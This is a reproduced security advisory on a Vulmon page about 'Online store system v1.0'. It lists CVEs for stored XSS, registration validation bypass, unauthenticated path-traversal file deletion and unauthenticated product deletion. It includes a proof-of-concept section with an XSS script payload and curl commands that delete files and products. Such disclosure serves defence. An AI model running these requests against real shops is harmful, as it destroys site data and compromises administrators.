Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Multiple vulnerabilities in Online store system v1.0 Stored XSS and unauthenticated product deletions.

Related Vulnerabilities: CVE-2019-8288   CVE-2019-8289   CVE-2019-8290   CVE-2019-8291   CVE-2019-8292  
Source 
                Title: Multiple vulnerabilities in Online store system v1.0 Stored XSS and unauthenticated product deletions.
Author: Larry W. Cashdollar @_larry0
Date: 2019-09-18
CVE-IDs: CVE-2019-8288 CVE-2019-8289 CVE-2019-8290 CVE-2019-8291
Download Site: https://www.abcprintf.com/view_download.php?id=17
Vendor: adcprintf
Vendor Notified: 2019-09-18
Vendor Contact: abcprintf () gmail com
Advisory: http://www.vapidlabs.com/advisory.php?v=210
Description: "Online store system" is a drop in customizable electronic store front. It has an administrative interface 
allowing user and product management. 
Vulnerability:
The application contains stored XSS vulnerabilities throughout the form page user_view.php  as none of the variables 
are sanitized before being presented back to the client. This can be exploited by a new user injecting cookie stealing 
code into their login information form and waiting for an administrative user to navigate to the users panel. 

CVE-2019-8288 
159  echo '<td>'.$row['adidas_member_user'].'</td>'; 
CVE-2019-8289 
160 echo '<td>'. $row['adidas_member_email'] . '</td>';
 CVE-2019-8290 The registration form requirements for the member email format can be bypassed by posting directly to 
sent_register.php allowing special characters to be included and an XSS payload to be injected. 
CVE-2019-8291 The code in delete_file.php doesn't check to see if a user has administrative rights nor does it check 
for path traversal allowing a '..' to delete arbitrary files owned by the httpd process. 
CVE-2019-8292 The code in delete_product.php doesn't check to see if a user has administrative rights before allowing 
them to delete a product from the database.
Exploit Code:
1. Set login name or email to "><script>alert(1);</script>
2. $ curl -s cookie.txt -X POST -d "username=jsmith&password=jsmith123&email=\"><script>alert(1);</script>%40email.com" 
http://example.com/pso/sent_register.php
3.  
4.  
5. $ curl -s cookie.txt "http://example.com/pso/admin/delete_file.php?id=0&filename=../women.php";
6.  
7. $ curl -s cookie.txt http://example.com/pso/admin/product_delete.php?id=4

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started